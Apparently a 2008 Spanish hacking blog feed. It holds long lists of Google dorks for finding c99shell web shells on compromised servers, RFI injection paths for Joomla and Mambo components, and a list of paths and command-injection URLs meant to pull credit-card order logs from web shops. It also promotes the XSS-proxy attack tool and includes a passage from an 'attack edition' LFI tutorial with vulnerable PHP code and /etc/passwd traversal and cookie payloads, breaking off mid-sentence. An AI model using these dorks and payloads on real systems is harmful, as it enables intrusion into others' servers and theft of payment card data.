c99shell v. 1.0 pre-release build #16
intitle:c99shell intext:uname
allintext:C99Shell v. 1.0 pre-release build #12
c99shell v. 1.0 pre-release build #16
--[ c99shell v. 1.0 pre-release build #15 | Powered by ]--
allinurl: "c99.php"
allinurl: "c99.php"
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
"c99shell v 1.0"
ftp apache inurl:c99.php
c99shell+v.+1.0 16
C99Shell v. 1.0 pre-release build #16 download
intitle:c99shell "Software: Apache"
allinurl: c99.php
allintext: Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove

Logout
powered by Captain Crunch Security Team
powered by Captain Crunch Security Team
!C99Shell v. 1.0 pre-release build #5!
c99shell v. 1.0 release security
c99shell v. 1.0 pre-release build
inurl:c99.php
c99shell [file on secure ok ]?
C99Shell v. 1.3
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
inurl:c99.php uid=0(root)
 powered by Captain Crunch Security Team
C99Shell v. 1.0 pre-release build #16
c99shell[on file]ok
c99shell[file on ]ok
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
inurl:c99.php
"C99Shell v. 1.0 pre"
=C99Shell v. 1.0 pre-release
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
c99shell v. pre-release build
inurl:c99.php c99 shell
inurl:c99.php c99 shell
powered by Captain Crunch Security Team
inurl:c99.php
inurl:c99.php
!C99Shell v. 1.0 pre-release build #5!
intitle:"c99shell" filetype:php root
intitle:"c99shell" Linux infong 2.4
C99Shell v. 1.0 beta !
C99Shell v. 1.0 pre-release build #
inurl:"c99.php"
allintext:C99Shell v. 1.0 pre-release build #12
"C99Shell v. 1.0 pre"
powered by Captain Crunch Security Team
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
inurl:/c99.php?
allinurl:c99.php
intitle:C99Shell pre-release
inurl:"c99.php"
powered by Captain Crunch Security Team
inurl:c99.php
C99Shell v. 1.0 pre-release build #16!
allinurl:c99.php
C99Shell v. 1.0 pre-release build #16 administrator
intitle:c99shell filetype:php
powered by Captain Crunch Security Team
powered by Captain Crunch Security Team
C99Shell v. 1.0 pre-release build #12
c99shell v.1.0
allinurl:c99.php
"c99shell v. 1.0 pre-release build"
inurl:"c99.php" filetype:php
"c99shell v. 1.0 "
ok c99.php
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
 c99shell v. 1.0 pre-release build #16 |
!C99Shell v. 1.0 pre-release build #5!
!C99Shell v. 1.0 pre-release build #5!
allinurl:/c99.php
powered by Captain Crunch Security Team
inurl:c99.php
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
inurl:c99.php
powered by Captain Crunch Security Team
inurl:c99.php
C99Shell v. 1.0 pre-release
inurl:c99.php
inurl:c99.php ext:php
inurl:"c99.php"
allinurl:"c99.php"
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
powered by Captain Crunch Security Team
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout"
C99Shell v. 1.0 pre-release build #16 software apache
 Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
"c99shell v 1.0"
inurl:"c99.php"
allintitle: C99shell filetype:php
C99Shell v. 1.0 pre-release build #16!
"c99shell v. 1.0 pre-release"
c99shell v. 1.0 pre-release build #5
allinurl:"c99.php" filetype:php
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
!C99Shell v. 1.0 pre-release build #16!
inurl:c99.php
intitle:C99Shell v. 1.0 pre-release +uname
inurl:c99.php
c99shell v. 1.0
allinurl: c99.php
 --[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | ]--
inurl:"/c99.php"
c99shell +uname
c99shell php + uname
c99shell php + uname
--[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | ]--
allinurl:c99.php
!C99Shell v. 1.0 pre-release build #5!
C99Shell v.1.0 pre-release
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
inurl:c99.php
intitle:c99shell filetype:php
"Encoder Tools Proc. FTP brute"
"c99" filetype:php intext:"Safe-Mode: OFF"
c99shell v. 1.0 pre
inurl:c99.php
intitle:c99shell uname -bbpress
intitle:"index.of" c99.php
inurl:admin/files/
intitle:"index of /" "c99.php"
intitle:"index of" intext:c99.php
intitle:index.of c99.php
intitle:"index of" + c99.php
intitle:index/of file c99.php
intitle:index/of file c99.php
index of /admin/files/
intitle:"Index of/"+c99.php
c99.php "intitle:Index of "
c99.php "intitle:Index of "
c99.php "intitle:Index of "
intitle:index.of c99.php
img/c99.php
intitle:index.of c99.php
 img.c99.php
intitle:"Index of/"+c99.php
"index of /" c99.php
c99.php
intitle:"Index of" c99.php
"index of" c99.php
"Index of/"+c99.php

Algunas Busquedas Para Rfi:

/modules/coppermine/themes/default/theme.php?THEME_DIR=
/modules/4nAlbum/public/displayCategory.php?basepath=
/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=
/modules/coppermine/themes/maze/theme.php?THEME_DIR=
/modules/coppermine/themes/default/theme.php?THEME_DIR=
/modules/coppermine/include/init.inc.php?CPG_M_DIR=
/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=
/components/com_smf/smf.php?mosConfig_absolute_path=
/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=
/components/com_simpleboard/image_upload.php?sbp=
/components/com_simpleboard/file_upload.php?sbp=
/components/com_hashcash/server.php?mosConfig_absolute_path=
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=
/components/com_forum/download.php?phpbb_root_path=
/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=
/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=
/components/minibb/index.php?absolute_path=
/components/com_smf/smf.php?mosConfig_absolute_path=
/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=
/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=
/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=
/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=
/components/com_securityimages/configinsert.php?mosConfig_absolute_path=
/components/com_securityimages/lang.php?mosConfig_absolute_path=
########################
Y para Buscar CC's:

/~gcw/cgi-bin/Count.cgi?df=callcard.dat
/cgi-bin/PDG_Cart/shopper.conf
/cgi-local/PDG_Cart/shopper.conf
/cgi-bin/PDG_Cart/order.log
/PDG_Cart/order.log
/cgi-bin/cart32.exe/cart32clientlist
/cgi-bin/Count.cgi?df=callcard.dat
/cgi/PDG_Cart/order.log
/PDG_Cart/authorizenets.txt
/cgi-bin/PDG_Cart/mc.txt
/PDG/order.txt
/cgi-bin/PDG_cart/card.txt
/PDG_Cart/shopper.conf
/php/mlog.phtml
/php/mylog.phtml
/webcart/carts
/cgi-bin/orders.txt
/WebShop/logs
/cgi-bin/AnyForm2
/cgi-bin/mc.txt
/ccbill/secure/ccbill.log
/cgi-bin/orders/mc.txt
/WebCart/orders.txt
/cgi-bin/orders/cc.txt
/cvv2.txt
/cgi-bin/orderlog.txt
/WebShop/logs
/orderb/shop.mdb
/_private/shopping_cart.mdb
/scripts/iisadmin/tools/mkilog.exe
/cool-logs/mylog.html
/cool-logs/mlog.html
/easylog/easylog.html
/HyperStat/stat_what.log
/mall_log_files/
/scripts/weblog
/SiteScope/cgi/go.exe/SiteScope?page=eventLog&machine=&logName=System&account=administrator
/super_stats/access_logs
/trafficlog
/wwwlog
/Admin_files/order.log
/bin/orders/orders.txt
/cgi/orders/orders.txt
/cgi-bin/orders/orders.txt
/cgi-sys/orders/orders.txt
/cgi-local/orders/orders.txt
/htbin/orders/orders.txt
/cgibin/orders/orders.txt
/cgis/orders/orders.txt
/scripts/orders/orders.txt
/cgi-win/orders/orders.txt
/bin/pagelog.cgi
/cgi/pagelog.cgi
/cgi-bin/pagelog.cgi
/cgi-sys/pagelog.cgi
/cgi-local/pagelog.cgi
/cgibin/pagelog.cgi
/cgis/pagelog.cgi
/scripts/pagelog.cgi
/cgi-win/pagelog.cgi
/bin/DCShop/auth_data/auth_user_file.txt
/cgi/DCShop/auth_data/auth_user_file.txt
/cgi-bin/DCShop/auth_data/auth_user_file.txt
/cgi-sys/DCShop/auth_data/auth_user_file.txt
/cgi-local/DCShop/auth_data/auth_user_file.txt
/htbin/DCShop/auth_data/auth_user_file.txt
/cgibin/DCShop/auth_data/auth_user_file.txt
/cgis/DCShop/auth_data/auth_user_file.txt
/scripts/DCShop/auth_data/auth_user_file.txt
/cgi-win/DCShop/auth_data/auth_user_file.txt
/bin/DCShop/orders/orders.txt
/cgi/DCShop/orders/orders.txt
/cgi-bin/DCShop/orders/orders.txt
/cgi-sys/DCShop/orders/orders.txt
/cgi-local/DCShop/orders/orders.txt
/htbin/DCShop/orders/orders.txt
/cgibin/DCShop/orders/orders.txt
/cgis/DCShop/orders/orders.txt
/scripts/DCShop/orders/orders.txt
/cgi-win/DCShop/orders/orders.txt
/dc/auth_data/auth_user_file.txt
/dcshop/orders/orders.txt
/dcshop/auth_data/auth_user_file.txt
/dc/orders/orders.txt
/orders/checks.txt
/orders/mountain.cfg
/cgi-bin/shopper.cgi&TEMPLATE=ORDER.LOG
/webcart/carts
/webcart-lite/orders/import.txt
/webcart/config
/webcart/config/clients.txt
/webcart/orders
/webcart/orders/import.txt
/WebShop/logs/cc.txt
/WebShop/templates/cc.txt
/bin/shop/auth_data/auth_user_file.txt
/cgi/shop/auth_data/auth_user_file.txt
/cgi-bin/shop/auth_data/auth_user_file.txt
/cgi-sys/shop/auth_data/auth_user_file.txt
/cgi-local/shop/auth_data/auth_user_file.txt
/htbin/shop/auth_data/auth_user_file.txt
/cgibin/shop/auth_data/auth_user_file.txt
/cgis/shop/auth_data/auth_user_file.txt
/scripts/shop/auth_data/auth_user_file.txt
/cgi-win/shop/auth_data/auth_user_file.txt
/bin/shop/orders/orders.txt
/cgi/shop/orders/orders.txt
/cgi-bin/shop/orders/orders.txt
/cgi-sys/shop/orders/orders.txt
/cgi-local/shop/orders/orders.txt
/htbin/shop/orders/orders.txt
/cgibin/shop/orders/orders.txt
/cgis/shop/orders/orders.txt
/scripts/shop/orders/orders.txt
/cgi-win/shop/orders/orders.txt
/bin/shop.pl/page=;cat%20shop.pl
/cgi/shop.pl/page=;cat%20shop.pl
/cgi-bin/shop.pl/page=;cat%20shop.pl
/cgi-sys/shop.pl/page=;cat%20shop.pl
/cgi-local/shop.pl/page=;cat%20shop.pl
/htbin/shop.pl/page=;cat%20shop.pl
/cgibin/shop.pl/page=;cat%20shop.pl
/cgis/shop.pl/page=;cat%20shop.pl
/scripts/shop.pl/page=;cat%20shop.pl
/cgi-win/shop.pl/page=;cat%20shop.pl
/webcart-lite/orders/import.txt
/bin/cart.pl
/cgi/cart.pl
/cgi-bin/cart.pl
/cgi-sys/cart.pl
/cgi-local/cart.pl
/htbin/cart.pl
/cgibin/cart.pl
/scripts/cart.pl
/cgi-win/cart.pl
/cgis/cart.pl
/bin/cart.pl
/cgi/cart.pl
/cgi-bin/cart.pl
/cgi-sys/cart.pl
/cgi-local/cart.pl
/htbin/cart.pl
/cgibin/cart.pl
/cgis/cart.pl
/scripts/cart.pl
/cgi-win/cart.pl
/bin/cart32.exe
/cgi/cart32.exe
/cgi-bin/cart32.exe
/cgi-sys/cart32.exe
/cgi-local/cart32.exe
/htbin/cart32.exe
/cgibin/cart32.exe
/cgis/cart32.exe
/scripts/cart32.exe
/cgi-win/cart32.exe
/cgi-bin/www-sql;;;
/server%20logfile;;;
/cgi-bin/pdg_cart/order.log
/cgi-bin/shopper.exe?search
/orders/order.log
/orders/import.txt
/orders/checks.txt
/orders/orders.txt
/Orders/order.log
/order/order.log
/WebShop/logs/ck.log
/WebShop/logs/cc.txt
/WebShop/templates/cc.txt
/_private/orders.txt
/_private/orders.htm
/orders/mountain.cfg
/PDG_Cart/shopper.config
/Admin_files/order.log
/mall_log_files/order.log
/PDG_Cart/order.log
/cgi-bin/UltraBoard/UltraBoard.cgi?Action=PrintableTopic&Post=../../UBData/Members/members.grp&Board=6210&Idle=10&Sort=0&Order=Descend&Page=0&Session=;;;
/_private/shopping_cart.mdb
/cgi-bin/shopper.cgi
/cgi-bin/shop.cgi
/cgi-bin/perlshop.cgi
/cgi-bin/mall2000.cgi
/log/
/logfile/
/logfiles/
/logger/
/logging/
/logs/
/logs/access_log
/weblog/
/weblogs/
/cgi-bin/loadpage.cgi
/database/
/databases/
/cgi-bin/Web_Store/web_store.cgi
/scripts/cart32.exe
/scripts/c32web.exe
/cgi-bin/shopper?search=action&keywords=dhenzuser%20&template=order.log
/cgi-bin/DCShop/Orders/orders.txt
/cgi-bin/ezmall2000/mall2000.cgi
/cgi-bin/DCShop/Orders/orders.txt
/cgi-bin/DCShop/Auth_data/auth_user_file.txt
/cgi-bin/DCShop/Orders/orders.txt
/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.loghtml
/cgi-local/medstore/loadpage.cgi?user_id=id&file=data/orders.txt
/cgi-bin/shopper/cheddar/loadpage.cgi?user_id=id&file=data/db.txt
/cgi-bin/cart32/whatever-OUTPUT.txt
/cgi-bin/shopper.cgi?search=action&keywords=root%20&template=order.log
/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.loghtml
/cgi-bin/shopper/cheddar/loadpage.cgi?user_id=id&file=data/db.txt;CC
/derbyteccgi/shopper.cgi?key=SC7021&preadd=action&template=order.log
/derbyteccgi/shopper.cgi?search=action&keywords=moron&template=order.log
/cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20../../webcart/system/orders/orders.txt|&CODE=PHOLD;;;
/ccbill/secure/ccbill.log
/cgibin/shopper.cgi?search=action&keywords=moron&template=order.csv
/order13.txt
/cgi-bin/loadpage.cgi?user_id=id&file=data/db.txtcgi-bin/PDG_Cart/order.log
/cgi-bin/shopper.cgi?search=action&keywords=whinhall&template=order.log
/orders/db/zzzbizorders.log.html
/cgi-bin/Shopper.exe?search=action&keywords=psiber%20&template=other
isinglogorder.log
/cgi-bin/shopper.exe?search=action&keywords=psiber&template=order.log
/cgi-bin/shopper.exe?preadd=action&key=9461&template=order.log
/cgi-bin/shopper.exe?preadd=action&key=bajk390ss&template=order.log
/cgi-bin/shop.cgi/page=../../../../etc/hosts
/cgi-bin/cart32/CART32-order.txt
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:
/cgi-bin/mailview.cgi?cmd=view&fldrname=inbox&select=1&html
/cgi-bin/cart32.ini
/cgi-bin/cart32.exe/cart32clientlist
/cgi-bin/cart32.exe/error
/metacart/database/metacart.mdb
//shopping/database/metacart.mdb
/shopping/database/metacart.mdb
/fpdb/shop.mdb
/cgi-bin/shopper.cgi?keywords=usstick&search=action&template=order.log
/cgi-bin/shopper.cgi?display=action&template=order.log
/cgi-bin/shopper.exe?key=8360&preadd=action&template=order.log
/cgi-bin/shopper.exe?key=8360&preadd=action&template=sales.log
/cgi-bin/shopper.exe?key=8360&preadd=action&template=sell.log
/cgi-bin/shopper.exe?key=8360&preadd=action&template=admin.log
/cgi-bin/shopper.exe?key=8360&preadd=action&template=admin_files.log
/cgi-bin/shopper.cgi?keywords=usstick&search=action&template=order.log
/cgi-bin/shopper.cgi?keywords=psiber&search=action&template=order.log
/cgi-bin/shopper.cgi?keywords=9461&search=action&template=order.log
/cgi-bin/shopper.cgi?keywords=SC7021&search=action&template=order.log
/cgi-bin/shopper.cgi?keywords=cc&search=action&template=order.log
/cgi-bin/shopper.cgi?keywords=order&search=action&template=order.log
/cgi-bin/shopper.cgi?display=action&template=order.log
/cgi-bin/shopper.cgi?search=action&keywords=moron%20&template=shopper.conf
/Merchant2/modules/log/elf.mv?search=action&ORDERLOG.txt
/Merchant2/modules/log/malf.mv?search=action&ORDERLOG.txt
/cgi-bin/shopper.exe?search=action&keywords=CD006&template=sales.log
/cgi-bin/shopper.exe?search=action&keywords=sex&template=sell.log
/cgi-bin/shopper.exe?search=action&keywords=order&template=admin.log
/cgi-bin/shopper.exe?search=action&keywords=cc&template=admin_files.log
/cgi-bin/shopper.exe?search=action&keywords=hack&template=order.log
/cgi-bin/shopper.exe?search=action&keywords=9400&template=order.log
/cgi-bin/shopper.exe?search=action&keywords=psiber&template=order.log
/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.loghtml
/cgi-bin/shopper.cgi?search=action&keywords=root%20&template=order.log
/cgi-bin/shopper.exe?preadd=action&key=9461&template=order.log
/derbyteccgi/shopper.cgi?key=SC7021&preadd=action&template=order.log
/cgi-bin/cart32/mainframephotographics-ORDERS.txt
/cgi-bin/shopper.cgi&TEMPLATE=ORDER.LOG
/stats/08-hosts.htm&TEMPLATE=ORDER.LOG
/worlddirect/Web_store/Admin_files/order.log
/website/
/WebShop/templates/cc.txt
/WebShop/logs/ck.log
/WebShop/logs/cc.txt
/WebShop/logs/
/WebShop/
/WebCart/orders.txt
/webcart/
/Web_store/Admin_files/order.log
/STORE/orders.txt
/stats/08-hosts.htm&TEMPLATE=ORDER.LOG
/PSUser/PSCOErrPage.htm
/PDG_Cart/shopper.conf
/PDG_Cart/order.log
/PDG_Cart/authorizenets.txt
/PDG/order.txt
/orders/results
/Orders/orders.txt
/orders/order.log
/orders/mountain.cf
/orders/import.txt
/orders/import.txt
/orders/checks.txt
/orders/
/orders.txt
/orders.htm
/orderform/orders.txt
/order.txt
/derbyteccgi/shopper.cgi?key=SC7021&preadd=action&template=order.log
/cgi-local/medstore/loadpage.cgi?user_id=id&file=data/orders.txt
/cgi-bin/shopper.exe?search=action&keywords=%20&template=shopper.conf
/cgi-bin/shopper.exe
/cgi-bin/shopper.cgi&TEMPLATE=ORDER.LOG
/cgi-bin/perlshop.cgi
/cgi-bin/PDG_Cart/cc.log
/cgi-bin/orders/mc.txt
/cgi-bin/orders/cc.txt
/cgi-bin/orders.txt
/cgi-bin/orderlog.txt
/cgi-bin/loadpage.cgi?user_id=id&file=data/db.txt
/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.loghtml
/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.loghtm
/cgi-bin/ezmall2000/mall_log_files/order.log
/cgi-bin/cart32/mainframephotographics-ORDERS.txt
/cgi-bin/cart32/CART32-order.txt
/cgi-bin/cart.pl
/ASPSamp/AdvWorks/equipment/catalog_type.asp
/AdvWorks/equipment/catalog_type.asp
/Admin_files/order.log
/admin/Orders/orders.txt
/_private/shopping_cart.mdb

esa son la mayoria de las busquedas de dorks y palabras claves que estan haciendo en los motores de busquedas seguiremos actualizando por que a veces encontramos busquedas ridiculas y locas xD...

XSS-proxy - Cross Site Scripting herramienta Automatizada de ataques

noreply@blogger.com (r3b1rth X) — Sat, 25 Oct 2008 23:07:26 PDT

XSS-proxy es una Herramienta De Xss Automatizada Cruz-sitio de scripting (XSS) herramienta de ataque. Los documentos, herramientas y otros contenidos de esta herramienta es asuniendo que tienen una comprensión básica de XSS cuestiones y métodos de explotación existentes. Si no está familiarizado con XSS y, a continuación, le recomiendo que visite alguno de los enlaces / docs de abajo para obtener una mejor idea de lo que es XSS y la forma de detectar, arreglar, y se aprovechan de ella.

Cross Site Scripting (XSS)
CERT info on XSS

CGISecurity’s Cross Site Scripting FAQ
Gunter Ollmann’s XSS paper
PeterW’s Cross Site Request Forgery (CSRF) Concept
SecureNet’s Session Riding paper

Algunas ideas falsas acerca de XSS

"Un usuario tiene que hacer clic en un vínculo que estén afectados por XSS." No - si usted visita una página el navegador se ejecutará independientemente de que usted haga clic en un enlace. cuidadosamente este ejemplo por lo que no se ejecute en su navegador, pero me podría haber puesto las etiquetas de secuencias de comandos reales / comandos aquí y te hizo correr entonces transparente.
"XSS sólo pasa en boletines , blogs y otros sitios en los que un atacante puede cargar script de contenido." Esa es una forma en que el ataque puede suceder, pero un atacante también puede aprovechar los sitios que permiten HTML / SCRIPT etiquetas que se refleja de vuelta a la mismo usuario (como un formulario de búsqueda que se repite lo que fue informado de que debe buscar en la respuesta). Estas fallas son comúnmente combinado con redirecciones a sitios público o mensajes de correo electrónico para atacar a un segundo sitio.
"No.. sólo los ataques XSS crean ventanas emergentes, alertas y otras cosas molestas?" No - Normalmente se utilizan para revelar las cookies o la forma de acceso basada en la información a los atacantes. Después de obetner esta información, el atacante la utiliza para entrar en el mismo sitio que tú.
"Yo entiendo los XSS, pero no creo que es un enorme problema". Creo que usted cambia de opinión una vez que comprendes este avanzado ataque. Lea las cosas avanzadas y por debajo de jugar con XSS-proxy para ver cómo realmente lo mal que un XSS puede ser.

Puede descargar XSS-proxy aquí:

XSS-Proxy_0_0_12-book.pl

o leer mas AKA

fucking the Web Apps [LFI #1 - attack edition by JosS

noreply@blogger.com (r3b1rth X) — Fri, 24 Oct 2008 09:34:14 PDT

=-|=========================================-{ www.spanish-hackers.com }-====|
=-| fucking the Web Apps [LFI #1 - attack edition]-==========================|
=-|==========================================================================|
=-[ By JosS  ]-=========================-[ 07/10/2008]-=|  



____                  __                              __    __               
/\  _`\               /\ \      __                    /\ \__/\ \              
\ \ \L\_\__  __    ___\ \ \/'\ /\_\    ___      __    \ \ ,_\ \ \___      __  
\ \  _\/\ \/\ \  /'___\ \ , < \/\ \ /' _ `\  /'_ `\   \ \ \/\ \  _ `\  /'__`\
 \ \ \/\ \ \_\ \/\ \__/\ \ \\`\\ \ \/\ \/\ \/\ \L\ \   \ \ \_\ \ \ \ \/\  __/
  \ \_\ \ \____/\ \____\\ \_\ \_\ \_\ \_\ \_\ \____ \   \ \__\\ \_\ \_\ \____\
   \/_/  \/___/  \/____/ \/_/\/_/\/_/\/_/\/_/\/___L\ \   \/__/ \/_/\/_/\/____/
                                               /\____/                       
                                               \_/__/                        
__      __          __          ______                           
/\ \  __/\ \        /\ \        /\  _  \                          
\ \ \/\ \ \ \     __\ \ \____   \ \ \L\ \  _____   _____     ____ 
\ \ \ \ \ \ \  /'__`\ \ '__`\   \ \  __ \/\ '__`\/\ '__`\  /',__\
 \ \ \_/ \_\ \/\  __/\ \ \L\ \   \ \ \/\ \ \ \L\ \ \ \L\ \/\__, `\
  \ `\___x___/\ \____\\ \_,__/    \ \_\ \_\ \ ,__/\ \ ,__/\/\____/
   '\/__//__/  \/____/ \/___/      \/_/\/_/\ \ \/  \ \ \/  \/___/
                                            \ \_\   \ \_\        
                                             \/_/    \/_/        
                                                       
                                                       Local File Inclusion #1
                                                                attack edition

-[ INFOS ]-----------------------------------------------------------------------
Title: "fucking the Web Apps [LFI #1]"
Version: attack edition
Author: JosS

mail: sys-project[at]hotmail[dot]com
site: http://spanish-hackers.com
team: Spanish Hackers Team - [SHT]
date: 2008-10-07

-[ SUMMARY ]---------------------------------------------------------------------
 0x00: Introducción
 0x01: Local File Inclusion
 0x02: Exploits
 0x03: Créditos


                              ___ for the sake ___


------[ 0x00.- Introducción ]

Hola a todos los que están hoy aquí leyendo este 'paper' ya bien sea para repasar
conocimientos ya adquiridos o bien para profundizar y extender sus conocimientos.

Antes de empezar con la breve introducción sobre que leerás en este documento,
quisiera presentarme. Me hago llamar JosS y soy el fundador de Spanish Hackers Team,
una de mis pasiones dentro del ámbito informático es la de investigación de
vulnerabilidades (Bug Research) especialmente en aplicaciones webs (Web Apps) que
será el tema que tocaremos en este 'paper'. Les dejo mi perfil de milw0m por si
quieren saber más de mí.

id: 1248
profile: http://milw0rm.com/author/1248

Este texto no es para nada lo que os esperáis al leer el sumario, no vamos
a ver las técnicas en sí, lo que haremos es dejarnos de explicaciones básicas y
pasaremos a profundizar conocimientos. Veremos ejemplos reales no muy comunes,
por si nos pasase en una situación real no nos quedemos con la duda de, ¿ Qué
hago ahora?. A si que podría decir no muy atrevido que este 'paper' te abre
la mente y tus aspiraciones a explotar vulnerabilidades de distintas formas,
básicamente 'Thought hacker'.

Eso es lo que os espera en este aburrido y divertido 'paper'.


------[ 0x01.- Local File Inclusion ]

Vamos a ver distintas maneras de como pueden estar provocados los 'LFI' y por
tanto a distinta programación, distinta explotación, esto es lo que buscamos:
una mente abierta. ;)

[code #1]

x:  >...
if (isset($_GET["mode"]))

  {

    if ($_GET["mode"]=="edit")

  {

   if (isset($_GET['id']))

   {

     $notefile = $_GET['id'];

   if ($notefile == "new")

   {

    $title = "";

    $notes = "";

   }

   else

   {

    $temp = "notes/" . $notefile;

    require($temp);

   }
x:  <...
x: }}}

[ENDcode #1]

Este es el ejemplo más simple de 'LFI' que veremos. Como vemos no tiene mucha
dificultad para entender su comportamiento.

1) Comprueba si existe la variable 'mode' pasada por 'GET'. Si el resultado es
  1, es decir verdadero entonces entraremos dentro de la sentencia 'IF'.
2) Comprueba si existe la variable 'edit' pasada por 'GET'. Si el resultado es
  1, es decir verdadero entonces entraremos dentro de la sentencia 'IF'.

Continuamos avanzando ...

3) Comprueba si existe la variable 'id' pasada por 'GET'. Si el resultado es
  1, es decir verdadero entonces entraremos dentro de la sentencia 'IF'.
4) Pasa a la variable '$notefile' el valor que asignamos a 'id' por medio de
  'GET' y comprueba si la variable '$notefile' es igual a 'new', en este caso
  nos interesa que no entre en esa sentencia de 'IF', porque no está el include
  que buscamos, a si que haremos que en esa condición obtengamos el valor 0
  y pasemos al else.
5) Asigna a '$temp' una cadena con nuestro valor dentro de ella ($notefile).
6) Por último hace uso de la función 'require' e incluye la cadena '$temp' con
  nuestro valor dentro de ella.

Exploit: ?mode=edit&id=../../../../../../../../../../etc/passwd

En caso de tener:
$temp = "notes/" . $notefile . ".php";

El exploit tendría que tener un 'NULL BYTE' (h) al final de la cadena.

Exploit: ?mode=edit&id=../../../../../../../../../../etc/passwd

Esto fue todo para nuestro primer ejemplo normalito, de moento todo muy
básico, fácil y nada que no se haya visto. ¿Continuámos?

----

Después de a ver calentado vamos a por el segundo ejemplo. El código
es vulnerable a 'LFI' mediante la vulnerabilidad de 'Insecure Cookie
Handling'. Me imagino que os preguntaréis: ¿Una vulnerabilidad dentro
de otra? Raro no? ... pues no!. Miremos el ejemplo.

[code #2]

if(!empty($_COOKIE['language']) && !isset($_SESSION['language'])){
 $_SESSION['language'] = $_COOKIE['language'];
}

....

if(LANG == ""){
 if(!isset($_SESSION['language'])){
  include("lang/english/lang.php");
  $_LANG = "english";
 } else {
  include("lang/".$_SESSION['language']."/lang.php");
  $_LANG = $_SESSION['language'];
 }

... }

[ENDcode #2]

1) Comprueba si las dos variables "$_COOKIE['language'] y "$_SESSION['language']"
  no están definidas, en el código vemos claramente que no están definidas, por
  lo que entramos de lleno en el 'IF'.
2) Debemos saber que la variable '$_COOKIE' puede ser manipulada por el usuario,
  por lo que esa variable será nuestro vector de ataque. Como vemos en el código
  se le asigna a "$_SESSION['language']" el valor de "$_COOKIE['language']" que
  será introducido por nosotros mediante la vulnerabilidad de 'Insecure Cookie
  Handling'.
3) Comprueba que 'LANG' no tiene valor, en este caso es afirmativo y entramos al
  'IF'.
4) Si no está definida "$_SESSION['language']" entraríamos al 'IF' pero como el
  código pasó el valor de $_COOKIE a $_SESSION, la variable si está definida y
  nos saltaría al 'else'.
5) Dentro del 'else' hace uso de la función 'include' para incluir nuestra cadena.

Exploit:
javascript:document.cookie="language=../../../../../../../../../../etc/passwd; path=/";

Como vemos, tuvimos que añadir el NULL BYTE (h) porqué en el include teníamos una
cadena que se sumaría a la nuestra y evitaría nuestro 'Directory Traversal'.

¿Tenéis ganas de continuar? ... yo las tendría.

----

En este tercer y penúltimo ejemplo del apartado de 'LFI' tenemos una situación
muy parecida a la del ejemplo 2, solo que esta vez tenemos un intruso, la
función 'explode' de PHP. Abramos la mente y pensemos como un Hacker.

[code #3]

x:  >...
if (isset($HTTP_COOKIE_VARS["userInfo"]) && $HTTP_COOKIE_VARS["userInfo"] != "") {
 $userArray = explode(" ", $HTTP_COOKIE_VARS["userInfo"]);
 $userName = $userArray[0];
 $userID = $userArray[1];
 $userLang = $userArray[2];
 include("include/lang/$userLang/inc.messages.php");
 }
x:  <...

[ENDcode #3]

Debéis saber que "$HTTP_COOKIE_VARS" también puede ser manipulado por el usuario, no
os encerréis con "$_COOKIE", abriros ...

1) El único 'IF' del código comprueba que la variable sea distinto a 'nothing', es
  decir que cuando nosotros ejecutemos nuestro 'exploit' daremos valor a
  "$HTTP_COOKIE_VARS["userInfo"]" y por tanto entramos de lleno en el 'IF'.
2) La función 'explode', el intruso que nos quiere fastidiar el 'bug' separa las
  distintas cadenas y las guarda en un 'array'.
3) Fijaros en la linea del 'include', incluye '$userLang' que recoje el tercer valor
  de la cadena que se encuentra en "$HTTP_COOKIE_VARS["userInfo"]".

Proof of Concept (function 'explode' PHP):

1)
String = JosS;
[0] = JosS;
[1] = ;
[2] = ; ---> INCLUDE

2)
String = JosS JosS JosS;
[0] = JosS;
[1] = JosS;
[2] = JosS; ---> INCLUDE

¿Entendéis?, es decir que deberíamos introducir algo como: basura basura loquenosinteresa

Exploit:
javascript:document.cookie="userInfo=JosS JosS ../../../../etc/passwd; path=/";


----

Para el cuarto y último ejemplo para terminar el apartado de 'LFI' tenemos una
situación parecida a la del ejemplo 1, es decir un LFI, que tenemos que jugar
